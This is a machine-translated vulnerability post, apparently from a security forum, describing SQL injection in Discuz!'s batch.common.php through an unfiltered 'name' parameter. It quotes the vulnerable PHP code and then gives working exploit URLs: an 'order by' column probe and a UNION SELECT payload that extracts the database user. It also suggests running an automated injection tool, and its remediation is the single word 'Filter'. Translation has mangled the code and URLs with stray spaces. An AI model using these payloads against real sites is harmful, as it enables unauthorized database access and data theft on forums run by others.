Discuz! Multi-version SQL injection vulnerability in a product
I tried 6.x 7.x and did not test it in other versions. It should also work,
Batch. common. php (218):} elseif ($ action = 'modelquote') {// model comment reference $ name = empty ($ _ GET ['name'])? '': Trim ($ _ GET ['name']); // No filter $ cid = empty ($ _ GET ['cid'])? 0: intval ($ _ GET ['cid']); $ html = false; if (! Empty ($ name )&&! Empty ($ cid) {$ item = array (); $ query = $ _ SGLOBAL ['db']-> query ('select * from '. tname ($ name. 'comments '). 'Where cid = \''. $ cid. '\ ''); // tname processing is then carried into if ($ item = $ _ SGLOBAL ['db']-> fetch_array ($ query )) {$ item ['message'] = preg_replace ("/<blockquote. +? <\/Blockquote>/is ",'', $ item ['message']); $ html = '[quote]'. $ blang ['from _ the_original_note ']. $ item ['author']. $ blang ['at']. sgmdate ($ item ['dateline ']). $ blang ['released']. "\ n ". cuthtml ($ item ['message'], 100 ). '[/quote]'; showxml ($ html) ;}} showxml ($ html );}
Let's look at the tname function:
function/common.func.php (601) :function tname($name, $mode=0) { global $_SC; if($mode == 1) { return (empty($_SC['dbname_bbs'])?'':'`'.$_SC['dbname_bbs'].'`.').'`'.$_SC['tablepre_bbs'].$name.'`'; } elseif ($mode == 2) { return (empty($_SC['dbname_uch'])?'':'`'.$_SC['dbname_uch'].'`.').'`'.$_SC['tablepre_uch'].$name.'`'; } else { return $_SC['tablepre'].$name; }}
Still not filtered. You can start injecting,
Exp,
Http: // xxx // batch. common. php? Action = modelquote & cid = 1 & name = spacecomments [SQL] #
This can be followed by order by directly.
Http: // xxx // batch. common. php? Action = modelquote & cid = 1 & name = spacecomments order by xxx #
Because the version is different, the number of fields is different. We recommend that you use orderby to determine the number of fields. For example, if the number of fields in 7.5 is 21, you can directly drop the 7.5 exp.
Http: // xxxxx/batch. common. php? Action = modelquote & cid = 1 & name = spacecomments % 20 where % 201 = 2% 20 union % 20 select %, 2, 5, concat (0x7e, user (), 0x7e, 0x5430304C7996474F21, 0x7e), 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17,18, 19,20, 21% 23
Of course, you can also directly configure the tool to run the job after it is lost:
It is not very good to use safe3. It can be tested using a different tool,
Solution:
Filter